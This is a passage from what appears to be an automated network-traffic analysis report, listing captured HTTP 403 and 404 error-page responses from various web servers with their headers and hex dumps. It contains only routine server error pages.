6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1229date: Mon, 09 Oct 2023 13:52:07 GMTserver: LiteSpeedx-hostname: ams111.yourwebhoster.comData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:07 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 09 Oct 2023 13:52:08 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:08 GMTContent-Type: text/htmlContent-Length: 75193Connection: keep-aliveVary: Accept-EncodingETag: "65142bc3-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:08 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=4, max=350Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:52:23 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GqyMkwbyYKSDzgQFZMXP5tm0mPjjPKQ5OM2lz4gN8dHNsXuX0rrjZHqTuwlLzZJyH9N3Rkno6xUvuJeSdOL5W6XkhZzMOfeFHpurTkNmEU90DjG1yKq8ASZMQgxP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a360ac52f09-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 Data Ascii: 15e5<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 09 Oct 2023 13:52:08 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:08 GMTServer: ApacheAccept-Ranges: bytesContent-Length: 904Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><html><head><meta http-equiv="Content-Type" content="text/css;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:52:08 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 